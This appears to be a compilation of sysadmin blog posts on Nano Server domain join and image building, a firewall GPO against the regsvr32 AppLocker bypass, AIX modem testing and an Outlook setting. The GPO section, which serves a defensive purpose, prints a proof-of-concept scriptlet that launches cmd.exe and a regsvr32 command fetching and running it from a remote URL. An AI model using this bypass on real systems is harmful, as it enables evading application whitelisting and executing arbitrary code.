Join Nano Server to a Domain

To join my Windows Server 2016 Nano Server to my test domain, I used the djoin.exe (Domain Join) command.

From a domain controller, or a server already joined to my domain, I ran the following command. This creates a file called NANOSERVERTP5 in the directory I ran the command from. That file is the offline-join blob; it contains the new computer account's password (base64-encoded, not encrypted), so handle it like any other credential and delete it once the join is done.

(Change the domain, machine name and output path to match your environment.)

djoin.exe /provision /domain TESTDOMAIN /machine NANOSERVERTP5 /reuse /savefile .\NANOSERVERTP5


Copy the NANOSERVERTP5 file to C:\ on the Nano Server. I temporarily enabled File and Printer Sharing through the firewall on the Nano Server in order to gain access to the administrative share, so I could copy it to \\192.168.100.50\c$.

In order to enter a remote PowerShell session, I needed to make sure I had a trusted host entry for my Nano Server in Web Services Management (WS-Management, or WSMan). I launched an administrative PowerShell prompt. Also, make sure the WinRM service is running on the machine you'll be using (net start winrm). A TrustedHosts entry turns off server authentication for that address (the connection falls back to NTLM), so remove it again once the Nano Server is domain joined and Kerberos can be used.

(Change the IP address to match your Nano Server.)

Set-Item WSMan:\localhost\Client\TrustedHosts -Value 192.168.100.50 -Concatenate

Accept (Y) the WinRM security prompt.

Start a remote PowerShell session into the Nano Server.

Enter-PSSession -ComputerName 192.168.100.50 -Credential Administrator

Run djoin and specify the location the NANOSERVERTP5 file was copied to; in my case, C:\NANOSERVERTP5.

djoin /requestodj /loadfile c:\NANOSERVERTP5 /windowspath c:\windows /localos
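The whole procedure above, end to end, as an added example (this is not the post's own script). TESTDOMAIN, NANOSERVERTP5 and 192.168.100.50 are the values used in the post; the local Administrator account on the Nano Server, the use of Restart-Computer over WSMan for the reboot, and the clean-up steps are assumptions. It adds the checks a practitioner would want: exit-code checks on both djoin calls, deletion of the blob on both ends, and removal of the TrustedHosts entry once it is no longer needed.

```powershell
# Added example (not the original post's commands). TESTDOMAIN, NANOSERVERTP5 and
# 192.168.100.50 are the values used in the post; everything else is an assumption.
$Domain   = 'TESTDOMAIN'
$Machine  = 'NANOSERVERTP5'
$NanoIP   = '192.168.100.50'
$BlobPath = Join-Path $PWD $Machine          # djoin writes the offline-join blob here

# 1. On a domain member: create (or reuse) the computer account and save the blob.
djoin.exe /provision /domain $Domain /machine $Machine /reuse /savefile $BlobPath
if ($LASTEXITCODE -ne 0) { throw "djoin /provision failed (exit code $LASTEXITCODE)" }
# The blob holds the new computer account's password (base64, not encrypted): treat it as a secret.

# 2. Copy the blob to the Nano Server over its admin share (File and Printer Sharing must be
#    allowed through the Nano firewall for this step).
$cred = Get-Credential -UserName "$NanoIP\Administrator" -Message 'Nano Server local Administrator'
New-PSDrive -Name Nano -PSProvider FileSystem -Root "\\$NanoIP\c$" -Credential $cred | Out-Null
Copy-Item -Path $BlobPath -Destination "Nano:\$Machine"
Remove-PSDrive -Name Nano

# 3. WinRM on the admin box: service running, and the Nano host trusted by IP. TrustedHosts
#    disables server authentication for that host (NTLM only, no Kerberos before the join),
#    so the entry is removed again in step 5.
if ((Get-Service WinRM).Status -ne 'Running') { Start-Service WinRM }
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $NanoIP -Concatenate -Force

# 4. Run the offline join on the Nano Server, delete the blob there, then reboot it.
Invoke-Command -ComputerName $NanoIP -Credential $cred -ArgumentList "C:\$Machine" -ScriptBlock {
    param($blob)
    if (-not (Test-Path $blob)) { throw "Blob $blob not found on target" }
    djoin.exe /requestodj /loadfile $blob /windowspath C:\Windows /localos
    if ($LASTEXITCODE -ne 0) { throw "djoin /requestodj failed (exit code $LASTEXITCODE)" }
    Remove-Item $blob -Force
}
# The join takes effect on reboot. Nano Server is managed over WinRM, so use the WSMan protocol.
Restart-Computer -ComputerName $NanoIP -Credential $cred -Protocol WSMan -Force

# 5. Clean up: drop the TrustedHosts entry and the local copy of the blob.
$remaining = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value -split ',' |
    Where-Object { $_ -and $_ -ne $NanoIP }
Set-Item WSMan:\localhost\Client\TrustedHosts -Value ($remaining -join ',') -Force
Remove-Item $BlobPath -Force
```

After the reboot the server authenticates with Kerberos, so further Enter-PSSession calls should use its domain name rather than the IP address and no TrustedHosts entry is needed.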

Create Nano Server Image

I was trying to build a Nano Server image (2016 Tech Preview 5) and kept getting an error on the -GuestDrivers parameter. Turns out that is because the documentation had not been updated: instead of -GuestDrivers, the cmdlet now uses:

  1. -Edition [ Standard | Datacenter]
  2. -DeploymentType [ Guest | Host ]

Running the following updated command works without issue building the image.

(Change the media path, target path and computer name to match your environment.)

New-NanoServerImage -MediaPath c:\tp5iso -BasePath .\Base -TargetPath .\Nano1\Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard

Add Packages

You can add packages to the image that is being built by specifying -Packages PackageName; the parameter takes a comma-separated list if you need more than one.

To install IIS, for example (change the media path, target path and computer name to match your environment):

New-NanoServerImage -MediaPath c:\tp5iso -BasePath .\Base -TargetPath .\Nano1\Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard -Packages Microsoft-NanoServer-IIS-Package
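An added example (not from the original post) that covers both the image build and the package step above: it builds the image with two packages and then checks what actually landed in the VHD, rather than trusting the build output. The paths (c:\tp5iso, .\Base, .\Nano1\Nano3.vhd) and computer name are the post's; the module path under the TP5 media, the package selection (Defender plus IIS) and the .\mnt mount point are assumptions.

```powershell
# Added example, not the post's own command. Module path, package list and mount point are assumptions.
Import-Module 'C:\tp5iso\NanoServer\NanoServerImageGenerator\NanoServerImageGenerator.psm1'

# -Packages is a string array; list every package the image needs in one build.
$pkgs = @(
    'Microsoft-NanoServer-Defender-Package'   # Windows Server Antimalware
    'Microsoft-NanoServer-IIS-Package'        # Web Server (IIS)
)

New-NanoServerImage -MediaPath 'C:\tp5iso' -BasePath '.\Base' -TargetPath '.\Nano1\Nano3.vhd' `
    -ComputerName Nano3 -DeploymentType Guest -Edition Standard `
    -Packages $pkgs `
    -AdministratorPassword (Read-Host -AsSecureString 'Nano3 Administrator password')

# Check: mount the finished VHD read-only and list the Nano Server packages that are installed
# in it. The build log tells you what was requested; this tells you what is in the image.
$mnt = New-Item -ItemType Directory -Path '.\mnt' -Force
Mount-WindowsImage -ImagePath '.\Nano1\Nano3.vhd' -Index 1 -Path $mnt.FullName -ReadOnly | Out-Null
try {
    Get-WindowsPackage -Path $mnt.FullName |
        Where-Object PackageName -like 'Microsoft-NanoServer-*' |
        Select-Object PackageName, PackageState
}
finally {
    Dismount-WindowsImage -Path $mnt.FullName -Discard | Out-Null
}
```

The same Get-WindowsPackage check works against a running Nano Server over a remote session with -Online, which is useful when deciding whether a package still needs to be added after deployment.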

Here’s a listing of the Packages in the Server 2016 TP5 ISO as of this writing.

I used the following command within the Packages directory of the Nano distribution to generate this.

PS C:\users\rkreider\desktop\nanobase\Packages> gci . -Filter *.cab | ForEach-Object { Write-Output $_.BaseName; dism /online /get-packageinfo "/packagepath:$($_.FullName)" | Select-String 'Description|Product Name|^Name :' }
  • Microsoft-NanoServer-BootFromWim-Package
    Description : Boot from WIM support
    Name : Boot from WIM support
    Product Name : Microsoft-NanoServer-BootFromWim-Feature-Package
  • Microsoft-NanoServer-Compute-Package
    Description : Hyper-V provides the services that you can use to create and manage virtual machines and their resources. Each virtual machine is a virtualized computer system that operates in an isolated execution environment. This allows you to run multiple operating systems simultaneously.
    Name : Hyper-V
    Product Name : Microsoft-NanoServer-Compute-Feature-Package
  • Microsoft-NanoServer-Containers-Package
    Description : Provides services and tools to create and manage Windows Server Containers and their resources.
    Name : Containers
    Product Name : Microsoft-NanoServer-Containers-Feature-Package
  • Microsoft-NanoServer-DCB-Package
    Description : Data Center Bridging (DCB) is a suite of IEEE standards that are used to enhance Ethernet local area networks by providing hardware-based bandwidth guarantees and transport reliability. Use DCB to help enforce bandwidth allocation on a Converged Network Adapter for offloaded storage traffic such as Internet Small Computer System Interface, RDMA over Converged Ethernet, and Fibre Channel over Ethernet.
    Name : Data Center Bridging
    Product Name : Microsoft-NanoServer-DCB-Feature-Package
  • Microsoft-NanoServer-Defender-Package
    Description : Windows Server Antimalware helps protect your machine from malware.
    Name : Windows Server Antimalware
    Product Name : Microsoft-NanoServer-Defender-Feature-Package
  • Microsoft-NanoServer-DNS-Package
    Description : Domain Name System (DNS) Server provides name resolution for TCP/IP networks. DNS Server is easier to manage when it is installed on the same server as Active Directory Domain Services. If you select the Active Directory Domain Services role, you can install and configure DNS Server and Active Directory Domain Services to work together.
    Name : DNS Server
    Product Name : Microsoft-NanoServer-DNS-Feature-Package
  • Microsoft-NanoServer-DSC-Package
    Description : Windows PowerShell Desired State Configuration is a configuration management platform that uses a declarative syntax to express and enact system configuration state.
    Name : Windows PowerShell Desired State Configuration
    Product Name : Microsoft-NanoServer-DSC-Feature-Package
  • Microsoft-NanoServer-FailoverCluster-Package
    Description : Failover Clustering allows multiple servers to work together to provide high availability of server roles. Failover Clustering is often used for File Services, virtual machines, database applications, and mail applications.
    Name : Failover Clustering Service
    Product Name : Microsoft-NanoServer-FailoverCluster-Feature-Package
  • Microsoft-NanoServer-Guest-Package
    Description : Hyper-V guest drivers for using Nano Server as a virtual machine
    Name : Hyper-V guest drivers
    Product Name : Microsoft-NanoServer-Guest-Feature-Package
  • Microsoft-NanoServer-Host-Package
    Description : Support for bare metal deployments
    Name : Bare metal deployment
    Product Name : Microsoft-NanoServer-Host-Feature-Package
  • Microsoft-NanoServer-IIS-Package
    Description : Web Server (IIS) provides a reliable, manageable, and scalable Web application infrastructure.
    Name : Web Server (IIS)
    Product Name : Microsoft-NanoServer-IIS-Feature-Package
  • Microsoft-NanoServer-NPDS-Package
    Description : Network Performance Diagnostics Service (NPDS)
    Name : Network Performance Diagnostics Service (NPDS)
    Product Name : Microsoft-NanoServer-NPDS-Feature-Package
  • Microsoft-NanoServer-OEM-Drivers-Package
    Description : Server Core drivers
    Name : Server Core drivers
    Product Name : Microsoft-NanoServer-OEM-Drivers-Feature-Package
  • Microsoft-NanoServer-SCVMM-Compute-Package
    Description : System Center Virtual Machine Manager Hyper-V agent
    Name : System Center Virtual Machine Manager Hyper-V agent
    Product Name : Microsoft-NanoServer-SCVMM-Compute-Feature-Package
  • Microsoft-NanoServer-SCVMM-Package
    Description : System Center Virtual Machine Manager agent
    Name : System Center Virtual Machine Manager agent
    Product Name : Microsoft-NanoServer-SCVMM-Feature-Package
  • Microsoft-NanoServer-SecureStartup-Package
    Description : Secure Startup support
    Name : Secure Startup support
    Product Name : Microsoft-NanoServer-SecureStartup-Feature-Package
  • Microsoft-NanoServer-ShieldedVM-Package
    Description : Host Guardian provides the features necessary on a Hyper-V server to provision Shielded Virtual Machines.
    Name : Shielded VM support
    Product Name : Microsoft-NanoServer-ShieldedVM-Feature-Package
  • Microsoft-NanoServer-Storage-Package
    Description : File Server role and other storage components
    Name : File Server role and other storage components
    Product Name : Microsoft-NanoServer-Storage-Feature-Package

GPO to block regsvr32 AppLocker Bypass Vulnerability

A recently disclosed method of bypassing AppLocker with regsvr32.exe affects Windows 7, 8/8.1 and 10 (Professional and Enterprise editions): regsvr32 is a signed Microsoft binary that AppLocker's default rules allow, and with scrobj.dll it will fetch and execute a COM scriptlet from a URL. One workaround is to stop regsvr32 from reaching remote resources by blocking regsvr32.exe in the Windows Firewall. Be clear about what that covers: it blocks the remote-fetch variant, but a scriptlet that is already on disk (or delivered some other way) still runs through regsvr32 and scrobj.dll, and on 64-bit Windows the rule must also cover the 32-bit copy in SysWOW64, not just the one in System32. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO, named it Firewall: Block regsvr32, and then edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.


Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard


Choose Program as the type of rule to create and click Next >


Use C:\windows\system32\regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose it.


Choose Block as the action and click Next >


Apply it to all network locations.


Give the rule a name and, optionally, a description.


The block rule is now listed under Inbound Rules.

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new rule under Outbound Rules.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on a client to force an immediate Group Policy refresh.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file yourself (it doesn’t have to have the .SCT extension; it can be anything…).

backdoor.sct

<?XML version="1.0"?>
<scriptlet>
<registration
 progid="Empire"
 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language="JScript">
 <![CDATA[

 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).
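The same GPO built from PowerShell, as an added example rather than the post's own steps. It uses the GroupPolicy and NetSecurity modules (RSAT), which are assumptions, as is the domain FQDN testdomain.local; the GPO name Firewall: Block regsvr32 is the post's. It goes one step further than the wizard walkthrough above by blocking both copies of regsvr32.exe on 64-bit Windows and by verifying on the client that the rules actually arrived in the active firewall policy.

```powershell
# Added example, not from the original post. Domain FQDN and module availability are assumptions.
$Gpo   = 'Firewall: Block regsvr32'
$Store = "testdomain.local\$Gpo"      # PolicyStore 'domain\GPOname' targets rules at that GPO

New-GPO -Name $Gpo -ErrorAction SilentlyContinue | Out-Null

# 64-bit Windows ships two regsvr32.exe binaries. A rule for System32 alone leaves the
# 32-bit one in SysWOW64 free to fetch scriptlets. %SystemRoot% keeps the rule portable.
$binaries = @(
    '%SystemRoot%\System32\regsvr32.exe',
    '%SystemRoot%\SysWOW64\regsvr32.exe'
)

# Write all rules into the GPO in one batched session (one save instead of one AD write per rule).
$session = Open-NetGPO -PolicyStore $Store
foreach ($bin in $binaries) {
    $dirName = Split-Path (Split-Path $bin) -Leaf      # System32 or SysWOW64, for the rule name
    foreach ($dir in 'Inbound', 'Outbound') {
        New-NetFirewallRule -GPOSession $session `
            -DisplayName "Block regsvr32 ($dir, $dirName)" `
            -Description 'Deny network access to regsvr32.exe (AppLocker bypass via scrobj.dll)' `
            -Direction $dir -Action Block -Program $bin -Profile Any -Enabled True | Out-Null
    }
}
Save-NetGPO -GPOSession $session

# Link the GPO at the domain root so every domain-joined machine receives it.
New-GPLink -Name $Gpo -Target 'DC=testdomain,DC=local' -LinkEnabled Yes -ErrorAction SilentlyContinue | Out-Null

# Check on a client after the refresh: the four rules must appear in the ActiveStore
# (the merged local + GPO policy the firewall is really enforcing), one per binary and direction.
gpupdate /force | Out-Null
Get-NetFirewallRule -PolicyStore ActiveStore -DisplayName 'Block regsvr32*' |
    Get-NetFirewallApplicationFilter |
    Select-Object Program
```

If the ActiveStore query comes back empty, the GPO has not applied to this machine (check the link, security filtering and gpresult /r) and the regsvr32 test command above will still succeed.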

Test Dial on Modem in AIX

Had an issue with dial-out on an AIX system this morning. The problem is resolved, but I learned a pretty handy little command for testing dial-out (I didn’t have a butt set with me).

Using cu -n -d -l tty2, I can dial-out to my cellphone to help in troubleshooting the problem.

# cu -n -d -l tty2
Please enter the number: xxxxxxxxxx
altconn called
Device Type ACU wanted
ttylock tty2 succeeded
Attempting to open /dev/tty2
clear O_NDELAY
filelock: ok
fixline(7, 19200)
gdial(fcmulhays) called
expect: ("")
got it
sendthem (DELAY
AT^M)
expect: (OK)
AT^M^M^JOKgot it
sendthem (PAUSE
nap(25) ATE1QV1M1Y1&R&D&E7#PDTxxxxxxxxxx^M)
expect: (CONNECT)
^M^JATE1QV1M1Y1&R&D&E7#PDTxxxxxxxxxx^M^Z[1] + Stopped (SIGTSTP)

Here we see it dial the number, my cellphone (indicated with X’s — creepers!).

This failed, so I ^C’d the process. I reworked some of the terminations on the block from the demarc and tried again. The next time was successful and I received the dial-out call from AIX.

Speed up Send/Receive in Outlook 2013 Synchronized Folders

Ran into a performance issue for an end-user today where the Send/Receive process was hanging on synchronizing subscribed folders.

One method to help speed up this process is to disable calculating the number of unread items in each subscribed folder that is being synchronized.

Step 1

Click on Send/Receive tab in the Ribbon and then click Send/Receive Groups and choose Define Send/Receive Groups


Step 2

Click Edit in the right pane


Step 3

Uncheck Get folder unread count for subscribed folders and click OK
